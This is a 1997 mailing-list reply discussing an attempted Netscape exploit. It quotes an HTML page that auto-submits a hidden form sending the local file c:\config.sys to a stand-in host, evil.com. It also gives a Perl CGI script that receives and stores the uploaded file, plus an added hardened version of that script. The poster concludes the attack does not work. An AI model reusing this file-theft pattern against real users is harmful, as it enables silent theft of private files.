Re: Netscape Exploit

Micah Brandon (brandon@VV.COM)
Sat, 14 Jun 1997 19:57:55 -0400

At 07:21 PM 6/14/97 -0500, root wrote:
>Here is a sample; it isn't complete, but you get the basic idea of what is
>going on
><HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
>
><BODY onLoad="daForm.submit()">
><FORM
> NAME="daForm"
> ACTION="http://evil.com/cgi-bin/formmail.pl"
> METHOD=POST>
>
><INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your
>Harddrive">
><INPUT TYPE=HIDDEN NAME="recipient" value="foobar@evil.com">
>
>and so on and so forth...

Ah....this won't work because you're onLoad'ing daForm before you've named
the form "daForm" plus the <INPUT TYPE=FILE...> line won't take a VALUE
attribute.

I've been hackin' at this, but I can't get it either. I can "see" the
value attribute being set but I don't think it's possible to change it with
JavaScript. We're probably barking up the wrong tree. Anyway, take a look
at the code below. Perhaps someone can take it from here:

Netscape Bug Test Page

And send.cgi is...

#!/usr/bin/perl

# Header
print "Content-type: text/html\n\n";
print "<H2>YOUR FILE</H2>";
print "<PRE>";

# Echo the raw POST body back and keep a copy of it
while (<STDIN>) {
    $FILETEXT .= $_;
    print;
}

print "</PRE>";

# Save the file to your server as well
open(SOMEFILE, "> /tmp/fromweb") or die "Cannot open /tmp/fromweb: $!";
print SOMEFILE $FILETEXT;
close(SOMEFILE);

---
micah
brandon@vv.com
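
An added example, not part of the original post: a variant of the send.cgi receiver above that caps the request body, HTML-escapes the data before echoing it, and writes through File::Temp instead of the fixed /tmp/fromweb path, which a local user could pre-create as a symlink. The 64 KB cap and the fromweb-XXXXXXXX template are assumptions chosen for illustration.

```perl
#!/usr/bin/perl
# Added example: hardened variant of the send.cgi echo script above.
use strict;
use warnings;
use File::Temp qw(tempfile);

my $MAX_BYTES = 64 * 1024;   # assumed cap on the request body

# Escape the characters that are significant in HTML so the echoed
# upload cannot inject markup into the response page.
sub html_escape {
    my ($s) = @_;
    $s =~ s/&/&amp;/g;
    $s =~ s/</&lt;/g;
    $s =~ s/>/&gt;/g;
    $s =~ s/"/&quot;/g;
    return $s;
}

# Read at most $limit bytes from the handle, honouring CONTENT_LENGTH.
sub read_body {
    my ($fh, $limit) = @_;
    my $want = $ENV{CONTENT_LENGTH} // 0;
    $want = 0 unless $want =~ /^\d+$/;      # reject non-numeric lengths
    $want = $limit if $want > $limit;       # never buffer more than the cap
    binmode $fh;
    my ($buf, $got) = ('', 0);
    while ($got < $want) {
        my $n = read($fh, $buf, $want - $got, $got);
        last unless $n;                     # EOF or read error
        $got += $n;
    }
    return $buf;
}

my $body = read_body(\*STDIN, $MAX_BYTES);

print "Content-type: text/html\n\n";
print "<H2>YOUR FILE</H2>\n<PRE>", html_escape($body), "</PRE>\n";

# tempfile() picks a random name and opens it with O_EXCL, so a
# pre-planted symlink at a guessed path in /tmp cannot redirect the write.
my ($out, $path) = tempfile('fromweb-XXXXXXXX', DIR => '/tmp', UNLINK => 0);
binmode $out;
print {$out} $body or die "write $path: $!";
close $out or die "close $path: $!";
```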